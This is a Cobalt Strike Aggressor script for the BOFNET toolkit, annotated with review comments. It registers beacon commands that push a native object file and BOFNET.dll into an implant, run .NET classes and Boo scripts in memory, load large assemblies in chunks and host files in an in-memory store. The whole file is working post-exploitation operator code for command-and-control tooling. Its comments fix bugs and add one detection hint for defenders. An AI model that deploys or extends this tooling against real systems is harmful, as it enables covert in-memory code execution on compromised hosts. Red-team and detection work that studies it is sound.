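# beacons
# Register every BOFNET alias with the beacon console's help system.
# Arguments to beacon_command_register are: command name, one-line description, long help text.
beacon_command_register("bofnet_init", "Initialize beacon ready to run BOFNET", "Synopsis: bofnet_init \nInitialize beacon ready to run BOFNET");
beacon_command_register("bofnet_shutdown", "Shutdown the BOFNET AppDomain", "Synopsis: bofnet_shutdown \nShutdown the BOFNET AppDomain");
beacon_command_register("bofnet_list", "List all executable BOFNET's available", "Synopsis: bofnet_list \nList all executable BOFNET's available");
beacon_command_register("bofnet_listassemblies", "List all loadded assembiles inside BOFNET", "Synopsis: bofnet_listassemblies \nList all loadded assembiles inside BOFNET");
beacon_command_register("bofnet_execute", "Execute a BOFNET class", "Synopsis: bofnet_execute class arg1 arg2 ...\nExecute's a BOFNET class along with all arguments supplied. Arguments with spaces should be quoted.\n");
beacon_command_register("bofnet_load", "Load a .NET assembly containing additional BOFNET classes", "Synopsis: bofnet_load assembly_path\nLoad a .NET assembly containing additional BOFNET classes\n");
beacon_command_register("bofnet_job", "Execute a BOFNET class as a background job in a seperate threead", "Synopsis: bofnet_job class arg1 arg2\nExecute a BOFNET class as a background job\n");
beacon_command_register("bofnet_jobs", "List active BOFNET background jobs", "Synopsis: bofnet_jobs\nList active BOFNET background jobs\n");
beacon_command_register("bofnet_jobstatus", "Dump the console buffer of an active BOFNET background job", "Synopsis: bofnet_jobstatus jobid\nDump the console buffer of an active BOFNET background job\n");
beacon_command_register("bofnet_jobkill", "Kills a running jobs thread (warning, could leave leaked resources/sockets behind", "Synopsis: bofnet_jobkill jobid\nKills a running jobs thread (warning, could leave leaked resources/sockets behind\n");
beacon_command_register("bofnet_boo", "Runs a Boo script in a temporary AppDomain which is then unloaded", "Synopsis: bofnet_boo filename.boo\nRuns a Boo script in a temporary AppDomain which is then unloaded\n");
# The help text below previously read "content_type\Uploads": the line-break escape had lost its "n",
# so the synopsis and the description ran together.
beacon_command_register("bofnet_vfs_add", "Uploads a file to the in memory VFS storage", "Synopsis: bofnet_vfs_add local_path filename content_type\nUploads a file to the in memory VFS store\n");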
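# Read an entire file from the operator's machine and return its raw bytes.
#   $1 - path of the file to read
# Returns whatever readb() yields for the whole file (-1 means "read to the end").
sub readAllFileData {
    # Keep the scratch variables local: without this declaration they are script-wide
    # globals and every call overwrites whatever another routine stored under the same name.
    local('$fileHandle $fileData');

    $fileHandle = openf($1);
    $fileData = readb($fileHandle, -1);
    closef($fileHandle);

    # NOTE(review): a failed openf() is not detected here; callers in this file test
    # -exists before calling, but an unreadable file would still pass that test.
    return $fileData;
}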
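# Turn an array of arguments into one space-separated string with each argument
# wrapped in double quotes, so arguments containing spaces stay in one piece.
#   $1 - array of argument strings
# Returns the quoted string ("" for an empty array).
sub addQuotes {
    # Scratch variables are local so that a call cannot clobber same-named globals
    # elsewhere in the script ($idx and $result used to leak).
    local('@quoted $entry $trimmed');
    @quoted = @();

    foreach $entry ($1) {
        # Drop leading whitespace; the capture group keeps everything after it.
        $trimmed = matches($entry, '\s*(.*)')[0];
        push(@quoted, "\"$trimmed\"");
    }

    # NOTE(review): a double quote inside an argument is passed through unescaped, so
    # such an argument can end its own quoting early. Confirm how the receiving BOFNET
    # argument parser treats embedded quotes before relying on this for arbitrary input.
    return join(" ", @quoted);
}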
# Read the native BOFNET runtime object file that matches the beacon's architecture.
#   $1 - beacon ID (used for barch() and for logging to that beacon's console)
# Returns the file's bytes, or $null after logging an error when the file is missing.
sub loadBOFNativeRuntime {
    # The file name is built from barch($1), e.g. bofnet_execute.cpp.<arch>.obj, and is
    # resolved relative to this script. $nativeBOFPath is left unscoped, as in the
    # original; other code in this script may read it.
    $nativeBOFPath = script_resource('bofnet_execute.cpp.' . barch($1) . '.obj');

    if (!-exists $nativeBOFPath) {
        blog($1, "[!] The BOFNET native runtime file $nativeBOFPath doesn't exist");
        return $null;
    }

    return readAllFileData($nativeBOFPath);
}
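# Run a BOFNET class with an already-packed argument buffer.
#   $1 - beacon ID
#   $2 - fully qualified BOFNET class name
#   $3 - raw argument bytes, appended after the NUL that terminates the class name
sub bofnet_execute_raw {
    local('$bofnetNative');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the runtime could not be read; loadBOFNativeRuntime has already logged why.
    # The previous guard was written as "!= $null", i.e. it returned when the runtime WAS
    # loaded. `is` is Sleep's identity test and the reliable way to compare with $null.
    if ($bofnetNative is $null) {
        return;
    }

    beacon_inline_execute($1, $bofnetNative, "go", "$2\x00" . $3);
}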
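# Not secure random string by any means!
# Build a string of $1 characters drawn from [a-zA-Z0-9] with rand().
#   $1 - number of characters wanted
# Returns the generated string ("" when $1 is 0).
# In this file the result only labels the chunks of one bofnet_load upload. It must not
# be reused as a token, key or any other value that has to be unpredictable.
sub generateRandomString {
    # Local scratch variables: $idx in particular used to be a global shared with
    # other routines in this script.
    local('$validChars $validCharsCount $randomString $idx');

    $validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    $validCharsCount = strlen($validChars);
    $randomString = "";

    for ($idx = 0; $idx < $1; $idx++) {
        $randomString = $randomString . charAt($validChars, rand($validCharsCount));
    }

    return $randomString;
}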
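# bofnet_init: send the managed BOFNET runtime (BOFNET.dll) to the beacon through the
# native runtime object and run BOFNET.Bofs.Initializer.
#   $1 - beacon ID
alias bofnet_init {
    local('$bofnetNative $bofnetRuntime');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    # NOTE(review): BOFNET.dll is read without an -exists check, unlike the native object file.
    $bofnetRuntime = readAllFileData(script_resource('BOFNET.dll'));

    btask($1, "Initializing BOFNET");
    # Payload layout: class name, NUL, then the raw bytes of BOFNET.dll.
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Initializer\x00" . $bofnetRuntime);
}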
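# bofnet_shutdown: run BOFNET.Bofs.Shutdown on the beacon (per the registered help text,
# this shuts down the BOFNET AppDomain).
#   $1 - beacon ID
alias bofnet_shutdown {
    local('$bofnetNative');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Shuting down BOFNET");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Shutdown\x00");
}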
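# bofnet_list: run BOFNET.Bofs.List on the beacon to list the available BOFNET classes.
#   $1 - beacon ID
alias bofnet_list {
    local('$bofnetNative');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Listing BOFNET classes");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.List\x00");
}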
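# bofnet_listassemblies: run BOFNET.Bofs.ListAssemblies on the beacon to list the
# assemblies currently loaded inside BOFNET.
#   $1 - beacon ID
alias bofnet_listassemblies {
    local('$bofnetNative');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    btask($1, "Listing loaded BOFNET assemblies");
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ListAssemblies\x00");
}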
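# bofnet_execute: run a BOFNET class with the arguments typed after it.
#   $1 - beacon ID
#   $2 - BOFNET class name
#   $3.. - optional arguments; each one is quoted by addQuotes before being sent
alias bofnet_execute {
    local('$bofnetNative $bofArguments @argParts');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    # Without arguments the payload is just the class name followed by NUL.
    $bofArguments = "\x00";

    # Skip the beacon ID and the class name; everything after them is an argument.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to execute BOFNET $2");
    beacon_inline_execute($1, $bofnetNative, "go", $2 . $bofArguments);
}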
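# bofnet_load: send a .NET assembly from the operator's machine to BOFNET in chunks,
# handing each chunk to BOFNET.Bofs.AssemblyLoader.
#   $1 - beacon ID
#   $2 - local path of the assembly
# Review note for defenders: what the receiving side does with the chunks is not visible
# in this script. If it loads the reassembled bytes as a managed assembly, CLR
# assembly-load telemetry on the host is the place to look for it.
alias bofnet_load {
    local('$assemblyData $chunkSize $rawData $rawLength $numChunks $remainder $tailOffset $id $i $offset $chunk');

    # 900k chunks sent to leave room for protocol data too
    $chunkSize = 1024 * 900;

    # The original read $nativeBOFPath here (a leftover global unrelated to the assembly)
    # into $assemblyData, which was overwritten before use; only the existence test matters.
    if (!-exists $2) {
        blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
        return;
    }

    btask($1, "Attempting to load large .NET assembly $2 into BOFNET");

    $rawData = readAllFileData($2);
    $rawLength = strlen($rawData);
    $remainder = $rawLength % $chunkSize;
    # Subtracting the remainder first makes the division exact, so the count of full
    # chunks does not depend on how "/" rounds.
    $tailOffset = $rawLength - $remainder;
    $numChunks = $tailOffset / $chunkSize;

    # One random label per upload; every chunk carries it (first field of the packed data).
    $id = generateRandomString(8);

    for ($i = 0; $i < $numChunks; $i++) {
        $offset = $i * $chunkSize;
        $chunk = substr($rawData, $offset, $offset + $chunkSize);
        $assemblyData = bof_pack($1, "Zib", $id, $chunkSize, $chunk);
        bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
    }

    if ($remainder > 0) {
        # Take everything from the end of the last full chunk. The original passed an end
        # index one past the end of the data.
        $chunk = substr($rawData, $tailOffset);
        # NOTE(review): the integer field is $chunkSize for the short final chunk as well,
        # as in the original - confirm what AssemblyLoader expects in that field.
        $assemblyData = bof_pack($1, "Zib", $id, $chunkSize, $chunk);
        bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
    }
}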
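# bofnet_job: start a BOFNET class as a background job by passing it to
# BOFNET.Bofs.Jobs.JobRunner.
#   $1 - beacon ID
#   $2 - BOFNET class name
#   $3.. - optional arguments; each one is quoted by addQuotes before being sent
alias bofnet_job {
    local('$bofnetNative $bofArguments @argParts');

    $bofnetNative = loadBOFNativeRuntime($1);

    # Stop when the native runtime could not be read; the loader has already logged why.
    # The guard used to read "!= $null", which returned on a successful load instead.
    if ($bofnetNative is $null) {
        return;
    }

    # Without arguments the payload ends right after the class name.
    $bofArguments = "\x00";

    # Skip the beacon ID and the class name; everything after them is an argument.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $bofArguments = " " . addQuotes(@argParts) . "\x00";
    }

    btask($1, "Attempting to start BOFNET $2 as a job");
    # The job runner is the class that gets executed; the requested class is its first argument.
    beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunner " . $2 . $bofArguments);
}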
# bofnet_jobs: list active background jobs by re-dispatching to the bofnet_execute
# alias with the BOFNET.Bofs.Jobs.JobList class.
#   $1 - beacon ID
alias bofnet_jobs {
    local('$jobListClass');

    $jobListClass = "BOFNET.Bofs.Jobs.JobList";
    fireAlias($1, "bofnet_execute", $jobListClass);
}
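# bofnet_jobstatus: dump the console buffer of a background job by re-dispatching to
# the bofnet_execute alias with the BOFNET.Bofs.Jobs.JobStatus class.
#   $1 - beacon ID
#   $2 - job id
alias bofnet_jobstatus {
    # Without a job id the class would be invoked with no argument at all; refuse
    # and show the synopsis instead of tasking the beacon.
    if ($2 is $null || $2 eq "") {
        blog($1, "[!] Usage: bofnet_jobstatus jobid");
        return;
    }

    fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobStatus " . $2);
}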
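# bofnet_jobkill: kill a background job's thread by re-dispatching to the
# bofnet_execute alias with the BOFNET.Bofs.Jobs.JobKill class.
#   $1 - beacon ID
#   $2 - job id
# Per the registered help text, killing a job can leave leaked resources/sockets behind.
alias bofnet_jobkill {
    # Without a job id the class would be invoked with no argument at all; refuse
    # and show the synopsis instead of tasking the beacon.
    if ($2 is $null || $2 eq "") {
        blog($1, "[!] Usage: bofnet_jobkill jobid");
        return;
    }

    fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobKill " . $2);
}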
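# bofnet_boo: read a Boo script from the operator's machine and hand it, together with
# its arguments, to BOFNET.Bofs.Boo.BooRunner.
#   $1 - beacon ID
#   $2 - local path of the .boo script
#   $3.. - optional script arguments; each one is quoted by addQuotes
alias bofnet_boo {
    local('$booCode @argParts $scriptArgs $args');

    # Same existence test bofnet_load applies before reading an operator-supplied path.
    if (!-exists $2) {
        blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
        return;
    }

    $booCode = readAllFileData($2);
    $scriptArgs = "";

    # Skip the beacon ID and the script path; everything after them is a script argument.
    @argParts = sublist(@_, 2);
    if (size(@argParts) > 0) {
        $scriptArgs = addQuotes(@argParts);
    }

    # Pack against the beacon this alias was invoked for. The original passed $bid,
    # which is never assigned anywhere in this alias.
    $args = bof_pack($1, "bZ", $booCode, $scriptArgs);

    blog($1, "Executing script $2 with the following arguments: $scriptArgs");
    bofnet_execute_raw($1, "BOFNET.Bofs.Boo.BooRunner", $args);
}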
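# bofnet_vfs_add: read a file from the operator's machine and pass it to BOFNET.Bofs.VFS
# together with the name and content type it should be stored under.
#   $1 - beacon ID
#   $2 - local path of the file
#   $3 - file name to store it under
#   $4 - content type
alias bofnet_vfs_add {
    local('$fileData $args');

    # @_ holds the beacon ID plus exactly three user arguments.
    if (size(@_) != 4) {
        # The usage line used to name a command ("bofnet_hostfile") that is not registered
        # in this script; it now matches the registered synopsis.
        blog($1, "[!] Usage: bofnet_vfs_add local_path filename content_type");
        return;
    }

    # Same existence test bofnet_load applies before reading an operator-supplied path.
    if (!-exists $2) {
        blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
        return;
    }

    $fileData = readAllFileData($2);
    $args = bof_pack($1, "bZZ", $fileData, $3, $4);

    blog($1, "Attempting to host file $2 (" . strlen($fileData) . " bytes) inside the BOFNET VFS");
    bofnet_execute_raw($1, "BOFNET.Bofs.VFS", $args);
}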